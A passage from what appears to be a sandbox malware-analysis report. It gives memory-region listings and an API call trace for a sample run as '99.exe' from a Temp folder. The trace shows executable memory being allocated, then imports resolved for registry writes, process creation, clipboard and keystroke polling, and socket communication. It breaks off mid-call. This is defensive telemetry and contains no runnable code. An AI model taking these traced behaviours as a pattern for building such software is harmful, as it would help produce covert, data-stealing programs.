"cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 8134 start_va = 0x35d0000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 8135 start_va = 0x3600000 end_va = 0x3603fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 8136 start_va = 0x3610000 end_va = 0x3675fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 8137 start_va = 0x3680000 end_va = 0x368dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 8216 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003690000" filename = "" Region: id = 8401 start_va = 0x36a0000 end_va = 0x36dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 8402 start_va = 0x36e0000 end_va = 0x37dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 8403 start_va = 0x37e0000 end_va = 0x381ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 8404 start_va = 0x3820000 end_va = 0x391ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 8405 start_va = 0x77030000 end_va = 0x771ccfff monitored = 0 entry_point = 0x770317e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 8406 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 8407 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 8408 start_va = 0x77580000 end_va = 0x775a6fff monitored = 0 entry_point = 0x775858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 8409 start_va = 0x76bf0000 end_va = 0x76c01fff monitored = 0 entry_point = 0x76bf1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 8410 start_va = 0x3920000 end_va = 0x392cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 8509 start_va = 0x3930000 end_va = 0x396ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003930000" filename = "" Region: id = 8510 start_va = 0x3970000 end_va = 0x3a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003970000" filename = "" Region: id = 8511 start_va = 0x3a70000 end_va = 0x3a95fff monitored = 0 entry_point = 0x3a72f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 8512 start_va = 0x3aa0000 end_va = 0x3aa2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscript.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\wscript.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wscript.exe.mui") Region: id = 8513 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Thread: id = 249 os_tid = 0xb80 [0278.751] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x1000, flProtect=0x40) returned 0x210000 [0278.758] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x1000, flProtect=0x40) returned 0x280000 [0278.765] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0278.778] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0278.778] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0278.778] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0278.778] VirtualAlloc (lpAddress=0x0, dwSize=0x546, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0278.997] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0278.998] VirtualAlloc (lpAddress=0x0, dwSize=0x44400, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0279.013] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0279.018] VirtualAlloc (lpAddress=0x0, dwSize=0x1600, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0279.018] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0279.019] VirtualAlloc (lpAddress=0x0, dwSize=0x1400, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0279.019] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0279.020] VirtualAlloc (lpAddress=0x0, dwSize=0x3400, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0279.021] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0279.022] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0279.022] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0279.022] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0279.022] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0279.022] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0279.022] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSection") returned 0x77a12c42 [0279.023] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0279.023] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0279.023] GetProcAddress (hModule=0x769b0000, lpProcName="LocalFree") returned 0x769c2cec [0279.023] GetProcAddress (hModule=0x769b0000, lpProcName="LocalAlloc") returned 0x769c166c [0279.023] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualQuery") returned 0x769c4412 [0279.023] GetProcAddress (hModule=0x769b0000, lpProcName="WideCharToMultiByte") returned 0x769c16ed [0279.023] GetProcAddress (hModule=0x769b0000, lpProcName="MultiByteToWideChar") returned 0x769c190e [0279.024] GetProcAddress (hModule=0x769b0000, lpProcName="lstrlenA") returned 0x769c5a03 [0279.024] GetProcAddress (hModule=0x769b0000, lpProcName="lstrcpynA") returned 0x769d18e2 [0279.024] GetProcAddress (hModule=0x769b0000, lpProcName="lstrcpyA") returned 0x769e2a6d [0279.024] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryExA") returned 0x769c48cb [0279.024] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadLocale") returned 0x769c357f [0279.024] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoA") returned 0x769c0e00 [0279.024] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0279.024] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0279.025] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0279.025] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoA") returned 0x769dd5b5 [0279.025] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0279.025] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0279.025] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0279.025] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileA") returned 0x769ce286 [0279.025] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa [0279.025] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0279.025] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0279.026] GetProcAddress (hModule=0x769b0000, lpProcName="UnhandledExceptionFilter") returned 0x769e76f7 [0279.026] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointer") returned 0x769c17b1 [0279.026] GetProcAddress (hModule=0x769b0000, lpProcName="SetEndOfFile") returned 0x769dce06 [0279.026] GetProcAddress (hModule=0x769b0000, lpProcName="RtlUnwind") returned 0x769ed1b3 [0279.026] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0279.026] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0279.026] GetProcAddress (hModule=0x769b0000, lpProcName="GetStdHandle") returned 0x769c516b [0279.026] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSize") returned 0x769c194e [0279.027] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTime") returned 0x769c5a4e [0279.027] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileType") returned 0x769c34e1 [0279.027] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0279.027] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0279.027] GetModuleHandleA (lpModuleName="user32.dll") returned 0x773b0000 [0279.027] GetProcAddress (hModule=0x773b0000, lpProcName="GetKeyboardType") returned 0x77409ac4 [0279.027] GetProcAddress (hModule=0x773b0000, lpProcName="LoadStringA") returned 0x773cdb21 [0279.027] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0279.028] GetProcAddress (hModule=0x773b0000, lpProcName="CharNextA") returned 0x773c7a1b [0279.028] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76c20000 [0279.028] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryValueExA") returned 0x76c348ef [0279.028] GetProcAddress (hModule=0x76c20000, lpProcName="RegOpenKeyExA") returned 0x76c34907 [0279.028] GetProcAddress (hModule=0x76c20000, lpProcName="RegCloseKey") returned 0x76c3469d [0279.028] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x757f0000 [0279.028] GetProcAddress (hModule=0x757f0000, lpProcName="VariantChangeTypeEx") returned 0x757f4c28 [0279.028] GetProcAddress (hModule=0x757f0000, lpProcName="VariantCopyInd") returned 0x7580e86c [0279.028] GetProcAddress (hModule=0x757f0000, lpProcName="VariantClear") returned 0x757f3eae [0279.029] GetProcAddress (hModule=0x757f0000, lpProcName="SysStringLen") returned 0x757f4680 [0279.029] GetProcAddress (hModule=0x757f0000, lpProcName="SysFreeString") returned 0x757f3e59 [0279.029] GetProcAddress (hModule=0x757f0000, lpProcName="SysReAllocStringLen") returned 0x757f7810 [0279.029] GetProcAddress (hModule=0x757f0000, lpProcName="SysAllocStringLen") returned 0x757f45d2 [0279.029] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0279.029] GetProcAddress (hModule=0x769b0000, lpProcName="TlsSetValue") returned 0x769c14db [0279.030] GetProcAddress (hModule=0x769b0000, lpProcName="TlsGetValue") returned 0x769c11e0 [0279.270] GetProcAddress (hModule=0x769b0000, lpProcName="TlsFree") returned 0x769c3537 [0279.270] GetProcAddress (hModule=0x769b0000, lpProcName="TlsAlloc") returned 0x769c4965 [0279.270] GetProcAddress (hModule=0x769b0000, lpProcName="LocalFree") returned 0x769c2cec [0279.270] GetProcAddress (hModule=0x769b0000, lpProcName="LocalAlloc") returned 0x769c166c [0279.270] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0279.271] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76c20000 [0279.271] GetProcAddress (hModule=0x76c20000, lpProcName="RegSetValueExA") returned 0x76c314b3 [0279.271] GetProcAddress (hModule=0x76c20000, lpProcName="RegSetValueA") returned 0x76c80e41 [0279.271] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryValueExA") returned 0x76c348ef [0279.271] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryInfoKeyA") returned 0x76c2e143 [0279.271] GetProcAddress (hModule=0x76c20000, lpProcName="RegOpenKeyExA") returned 0x76c34907 [0279.271] GetProcAddress (hModule=0x76c20000, lpProcName="RegEnumKeyExA") returned 0x76c31481 [0279.271] GetProcAddress (hModule=0x76c20000, lpProcName="RegCreateKeyExA") returned 0x76c31469 [0279.271] GetProcAddress (hModule=0x76c20000, lpProcName="RegCloseKey") returned 0x76c3469d [0279.271] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0279.271] GetProcAddress (hModule=0x769b0000, lpProcName="WritePrivateProfileStringA") returned 0x769e7018 [0279.271] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0279.272] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForSingleObject") returned 0x769c1136 [0279.272] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualUnlock") returned 0x769def11 [0279.272] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualQuery") returned 0x769c4412 [0279.272] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualLock") returned 0x769dec0b [0279.272] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0279.272] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0279.272] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0279.272] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadPriority") returned 0x769c326b [0279.272] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointer") returned 0x769c17b1 [0279.272] GetProcAddress (hModule=0x769b0000, lpProcName="SetFileAttributesA") returned 0x769deca3 [0279.272] GetProcAddress (hModule=0x769b0000, lpProcName="SetEndOfFile") returned 0x769dce06 [0279.272] GetProcAddress (hModule=0x769b0000, lpProcName="RemoveDirectoryA") returned 0x76a44a5f [0279.273] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0279.273] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceFrequency") returned 0x769c41a8 [0279.273] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceCounter") returned 0x769c1705 [0279.273] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0279.273] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0279.273] GetProcAddress (hModule=0x769b0000, lpProcName="IsBadReadPtr") returned 0x769ed065 [0279.273] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSection") returned 0x77a12c42 [0279.273] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalUnlock") returned 0x769dcfb4 [0279.273] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalHandle") returned 0x769ed26c [0279.273] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalLock") returned 0x769dd077 [0279.273] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalFree") returned 0x769c5510 [0279.273] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalAlloc") returned 0x769c5846 [0279.274] GetProcAddress (hModule=0x769b0000, lpProcName="GetWindowsDirectoryA") returned 0x769e2ada [0279.274] GetProcAddress (hModule=0x769b0000, lpProcName="GetVolumeInformationA") returned 0x769e6d9b [0279.274] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersionExA") returned 0x769c34c9 [0279.274] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersion") returned 0x769c441f [0279.274] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadPriority") returned 0x769c4377 [0279.274] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadLocale") returned 0x769c357f [0279.274] GetProcAddress (hModule=0x769b0000, lpProcName="GetTempPathA") returned 0x769e273c [0279.274] GetProcAddress (hModule=0x769b0000, lpProcName="GetTempFileNameA") returned 0x769e9d0f [0279.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemInfo") returned 0x769c4982 [0279.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0279.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetPrivateProfileStringA") returned 0x769d1804 [0279.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0279.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0279.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoA") returned 0x769dd5b5 [0279.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocalTime") returned 0x769c5a5e [0279.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0279.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSize") returned 0x769c194e [0279.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileAttributesA") returned 0x769c53cc [0279.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetExitCodeProcess") returned 0x769d1705 [0279.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetDriveTypeA") returned 0x769def45 [0279.275] GetProcAddress (hModule=0x769b0000, lpProcName="GetDiskFreeSpaceA") returned 0x76a448df [0279.276] GetProcAddress (hModule=0x769b0000, lpProcName="GetDateFormatA") returned 0x769ea939 [0279.276] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0279.276] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThread") returned 0x769c17cc [0279.276] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcess") returned 0x769c17e9 [0279.276] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentDirectoryA") returned 0x769ed4e6 [0279.276] GetProcAddress (hModule=0x769b0000, lpProcName="GetCPInfo") returned 0x769c5141 [0279.276] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0279.276] GetProcAddress (hModule=0x769b0000, lpProcName="FormatMessageA") returned 0x769e5f8d [0279.276] GetProcAddress (hModule=0x769b0000, lpProcName="FindNextFileA") returned 0x769ed52e [0279.276] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileA") returned 0x769ce286 [0279.276] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa [0279.277] GetProcAddress (hModule=0x769b0000, lpProcName="FileTimeToLocalFileTime") returned 0x769ce256 [0279.277] GetProcAddress (hModule=0x769b0000, lpProcName="FileTimeToDosDateTime") returned 0x769dc845 [0279.277] GetProcAddress (hModule=0x769b0000, lpProcName="ExpandEnvironmentStringsA") returned 0x769deb09 [0279.277] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0279.277] GetProcAddress (hModule=0x769b0000, lpProcName="EnumCalendarInfoA") returned 0x769e9e40 [0279.277] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0279.277] GetProcAddress (hModule=0x769b0000, lpProcName="DeviceIoControl") returned 0x769c31df [0279.277] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteFileA") returned 0x769c53fc [0279.277] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0279.277] GetProcAddress (hModule=0x769b0000, lpProcName="CreateProcessA") returned 0x769c1072 [0279.277] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0279.277] GetProcAddress (hModule=0x769b0000, lpProcName="CreateEventA") returned 0x769c323c [0279.277] GetProcAddress (hModule=0x769b0000, lpProcName="CreateDirectoryA") returned 0x769ed516 [0279.278] GetProcAddress (hModule=0x769b0000, lpProcName="CopyFileA") returned 0x769e58b5 [0279.278] GetProcAddress (hModule=0x769b0000, lpProcName="CompareStringA") returned 0x769c3c0a [0279.278] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0279.278] GetModuleHandleA (lpModuleName="version.dll") returned 0x0 [0279.278] LoadLibraryA (lpLibFileName="version.dll") returned 0x74520000 [0279.288] GetProcAddress (hModule=0x74520000, lpProcName="VerQueryValueA") returned 0x74521b72 [0279.288] GetProcAddress (hModule=0x74520000, lpProcName="GetFileVersionInfoSizeA") returned 0x74521c9c [0279.288] GetProcAddress (hModule=0x74520000, lpProcName="GetFileVersionInfoA") returned 0x74521ced [0279.288] GetModuleHandleA (lpModuleName="gdi32.dll") returned 0x77240000 [0279.288] GetProcAddress (hModule=0x77240000, lpProcName="SetBkMode") returned 0x772551a2 [0279.288] GetProcAddress (hModule=0x77240000, lpProcName="GetStockObject") returned 0x77254eb8 [0279.288] GetProcAddress (hModule=0x77240000, lpProcName="CreateFontA") returned 0x7725d0e8 [0279.288] GetProcAddress (hModule=0x77240000, lpProcName="CreateDIBitmap") returned 0x77257217 [0279.288] GetModuleHandleA (lpModuleName="user32.dll") returned 0x773b0000 [0279.289] GetProcAddress (hModule=0x773b0000, lpProcName="TranslateMessage") returned 0x773c7809 [0279.289] GetProcAddress (hModule=0x773b0000, lpProcName="ShowWindow") returned 0x773d0dfb [0279.289] GetProcAddress (hModule=0x773b0000, lpProcName="SetWindowTextA") returned 0x773d7aee [0279.289] GetProcAddress (hModule=0x773b0000, lpProcName="SetWindowPos") returned 0x773c8e4e [0279.289] GetProcAddress (hModule=0x773b0000, lpProcName="SetFocus") returned 0x773d2175 [0279.289] GetProcAddress (hModule=0x773b0000, lpProcName="SetDlgItemTextA") returned 0x773dc4d6 [0279.289] GetProcAddress (hModule=0x773b0000, lpProcName="SetClipboardData") returned 0x77408e57 [0279.289] GetProcAddress (hModule=0x773b0000, lpProcName="SendMessageA") returned 0x773d612e [0279.289] GetProcAddress (hModule=0x773b0000, lpProcName="SendDlgItemMessageA") returned 0x773ec112 [0279.289] GetProcAddress (hModule=0x773b0000, lpProcName="RegisterClassA") returned 0x773d434b [0279.289] GetProcAddress (hModule=0x773b0000, lpProcName="PostQuitMessage") returned 0x773c9abb [0279.289] GetProcAddress (hModule=0x773b0000, lpProcName="PeekMessageA") returned 0x773d5f74 [0279.290] GetProcAddress (hModule=0x773b0000, lpProcName="OpenClipboard") returned 0x773d8ecb [0279.290] GetProcAddress (hModule=0x773b0000, lpProcName="MsgWaitForMultipleObjects") returned 0x773d0b4a [0279.290] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0279.290] GetProcAddress (hModule=0x773b0000, lpProcName="LoadStringA") returned 0x773cdb21 [0279.290] GetProcAddress (hModule=0x773b0000, lpProcName="LoadIconA") returned 0x773cdafb [0279.290] GetProcAddress (hModule=0x773b0000, lpProcName="LoadCursorA") returned 0x773cdad5 [0279.290] GetProcAddress (hModule=0x773b0000, lpProcName="IsClipboardFormatAvailable") returned 0x773d8676 [0279.290] GetProcAddress (hModule=0x773b0000, lpProcName="GetWindowTextA") returned 0x773d0029 [0279.290] GetProcAddress (hModule=0x773b0000, lpProcName="GetWindowRect") returned 0x773c7f34 [0279.290] GetProcAddress (hModule=0x773b0000, lpProcName="GetSystemMetrics") returned 0x773c7d2f [0279.290] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageA") returned 0x773c7bd3 [0279.290] GetProcAddress (hModule=0x773b0000, lpProcName="GetFocus") returned 0x773d0dee [0279.291] GetProcAddress (hModule=0x773b0000, lpProcName="GetDlgItemTextA") returned 0x77426b36 [0279.291] GetProcAddress (hModule=0x773b0000, lpProcName="GetDlgItem") returned 0x773ef1ba [0279.291] GetProcAddress (hModule=0x773b0000, lpProcName="GetDesktopWindow") returned 0x773d0a19 [0279.291] GetProcAddress (hModule=0x773b0000, lpProcName="GetDC") returned 0x773c72c4 [0279.291] GetProcAddress (hModule=0x773b0000, lpProcName="GetAsyncKeyState") returned 0x773eeb96 [0279.291] GetProcAddress (hModule=0x773b0000, lpProcName="GetActiveWindow") returned 0x773ef5c7 [0279.291] GetProcAddress (hModule=0x773b0000, lpProcName="EndDialog") returned 0x773eb99c [0279.291] GetProcAddress (hModule=0x773b0000, lpProcName="EnableWindow") returned 0x773d2da4 [0279.291] GetProcAddress (hModule=0x773b0000, lpProcName="EmptyClipboard") returned 0x77427cb9 [0279.291] GetProcAddress (hModule=0x773b0000, lpProcName="DispatchMessageA") returned 0x773c7bbb [0279.291] GetProcAddress (hModule=0x773b0000, lpProcName="DialogBoxIndirectParamA") returned 0x7740ce64 [0279.291] GetProcAddress (hModule=0x773b0000, lpProcName="DestroyWindow") returned 0x773c9a55 [0279.291] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcA") returned 0x77a224e0 [0279.292] GetProcAddress (hModule=0x773b0000, lpProcName="CreateWindowExA") returned 0x773cd22e [0279.292] GetProcAddress (hModule=0x773b0000, lpProcName="CloseClipboard") returned 0x773d8e8d [0279.292] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76e80000 [0279.292] GetProcAddress (hModule=0x76e80000, lpProcName="CoCreateGuid") returned 0x76ec15d5 [0279.292] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0279.292] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersionExA") returned 0x769c34c9 [0279.292] GetModuleHandleA (lpModuleName="wsock32.dll") returned 0x0 [0279.292] LoadLibraryA (lpLibFileName="wsock32.dll") returned 0x6be10000 [0279.294] GetProcAddress (hModule=0x6be10000, lpProcName="ioctlsocket") returned 0x75613084 [0279.294] GetProcAddress (hModule=0x6be10000, lpProcName="WSACancelBlockingCall") returned 0x75625343 [0279.294] GetProcAddress (hModule=0x6be10000, lpProcName="WSAIsBlocking") returned 0x756253be [0279.294] GetProcAddress (hModule=0x6be10000, lpProcName="gethostbyname") returned 0x75627673 [0279.294] GetProcAddress (hModule=0x6be10000, lpProcName="send") returned 0x75616f01 [0279.294] GetProcAddress (hModule=0x6be10000, lpProcName="recv") returned 0x6be117a8 [0279.294] GetProcAddress (hModule=0x6be10000, lpProcName="connect") returned 0x75616bdd [0279.295] GetProcAddress (hModule=0x6be10000, lpProcName="WSACleanup") returned 0x75613c5f [0279.295] GetProcAddress (hModule=0x6be10000, lpProcName="closesocket") returned 0x75613918 [0279.295] GetProcAddress (hModule=0x6be10000, lpProcName="shutdown") returned 0x7561449d [0279.295] GetProcAddress (hModule=0x6be10000, lpProcName="socket") returned 0x75613eb8 [0279.295] GetProcAddress (hModule=0x6be10000, lpProcName="WSAStartup") returned 0x75613ab2 [0279.298] GetModuleFileNameA (in: hModule=0x280000, lpFilename=0x18fde8, nSize=0x105 | out: lpFilename="\n" (normalized: "c:\\windows\\syswow64\\\n")) returned 0x0 [0279.302] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fcc3, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe")) returned 0x2b [0279.302] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18fdd8 | out: phkResult=0x18fdd8*=0x0) returned 0x2 [0279.303] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18fdd8 | out: phkResult=0x18fdd8*=0x0) returned 0x2 [0279.303] lstrcpyA (in: lpString1=0x18fcc3, lpString2="\n" | out: lpString1="\n") returned="\n" [0279.303] GetThreadLocale () returned 0x409 [0279.303] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18fdd3, cchData=5 | out: lpLCData="ENU") returned 4 [0279.415] lstrlenA (lpString="\n") returned 1 [0279.418] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0xca29b0 [0279.422] GetKeyboardType (nTypeFlag=0) returned 4 [0279.422] GetCommandLineA () returned="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe\" " [0279.422] GetStartupInfoA (in: lpStartupInfo=0x18fe78 | out: lpStartupInfo=0x18fe78*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 